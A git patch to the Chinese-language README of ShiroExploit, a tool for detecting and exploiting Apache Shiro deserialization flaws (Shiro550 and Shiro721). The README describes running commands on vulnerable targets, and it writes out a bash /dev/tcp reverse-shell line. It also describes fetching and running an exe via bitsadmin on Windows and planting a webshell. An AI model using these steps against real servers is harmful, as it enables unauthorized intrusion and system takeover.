From 2a1345963abef48e989890dc43bb09ec221f7c7d Mon Sep 17 00:00:00 2001 From: feihong <59082458+feihong-cs@users.noreply.github.com> Date: Sun, 26 Jul 2020 13:06:52 +0800 Subject: [PATCH] Update README.md --- README.md | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index 6676995..84aff51 100644 --- a/README.md +++ b/README.md @@ -1,16 +1,15 @@ # ShiroExploit -支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持简单回显 +支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 ## 使用说明 ### 第一步:按要求输入要检测的目标URL和选择漏洞类型 + ```Shiro550```无需提供rememberMe Cookie,```Shiro721```需要提供一个有效的rememberMe Cookie -+ ```Shiro550```无需选择操作系统类型,```Shiro721```需要选择操作系统类型 -+ 可以手工指定特定的 Key 和 Gadget,默认不指定,会遍历所有的 Key 和 Gadget ++ 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType + 复杂Http请求支持直接粘贴数据包 -![pic1](https://raw.githubusercontent.com/feihong-cs/ShiroExploit_GUI/master/imgForReadMe/pic1.jpg) +![pic1](https://github.com/feihong-cs/ShiroExploit/blob/master/imgForReadMe/x001.jpg?raw=true) ### 第二步: 选择攻击方式 -![pic2](https://raw.githubusercontent.com/feihong-cs/ShiroExploit_GUI/master/imgForReadMe/pic2.png) +![pic2](https://github.com/feihong-cs/ShiroExploit/blob/master/imgForReadMe/x002.png?raw=true) #### 选择 ```使用 ceye.io 进行漏洞检测``` + 可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。 @@ -31,18 +30,15 @@ #### 选择 ```使用回显进行漏洞检测``` + 针对不出网的情况进行漏洞检测,此时可以检测的 Gadget 类型会少于使用 DNSLog 方式的 Gadget类型 -+ 目前主要是通过将命令执行结果写入 Web 目录下然后读取的方式实现回显 -+ 需要提供一个静态资源 URL,程序会将此静态资源所在的目录当做写入目录 -+ 注:开始的时候使用 ```https://blog.csdn.net/fnmsd/article/details/106709736``` 介绍的方式实现回显,在本地可以测试成功,但是在实际环境中基本不成功(可能是我的姿势有问题,欢迎探讨),所以目前是通过读写文件的方式实现回显,后期可能会加入其它方式 ++ 支持多种回显方式,回显方式和代码请参考 [deserizationEcho](https://github.com/feihong-cs/deserizationEcho) ++ 使用写文件回显方式时,可以提供一个静态资源 URL,程序会将此静态资源所在的目录当做写入目录,若不提供,则写入根目录 ### 第三步:检测漏洞并执行命令 + 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入。当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令。 + ```反弹shell(linux)``` 采用 ```bash -i >& /dev/tcp/1.2.3.4/443 0>&1``` 的方式反弹 shell + ```反弹shell(Windows)``` 采用 ```bitsadmin``` 下载指定 URL 的 exe 文件并执行的方式获取 shell -![pic5](https://raw.githubusercontent.com/feihong-cs/ShiroExploit_GUI/master/imgForReadMe/pic5.png) - -+ ```获取Webshell``` 可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取 -![pic3](https://raw.githubusercontent.com/feihong-cs/ShiroExploit_GUI/master/imgForReadMe/pic3.png) ++ ```获取Webshell``` 直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取 +![pic3](https://github.com/feihong-cs/ShiroExploit/blob/master/imgForReadMe/x003.png?raw=true) ## 备注 在使用漏洞检测主程序或者开启 HttpService/JRMPListener 时,均需要ysoserial.jar的支持,将ysoserial.jar和ShiroExploit.jar放置在同一目录即可。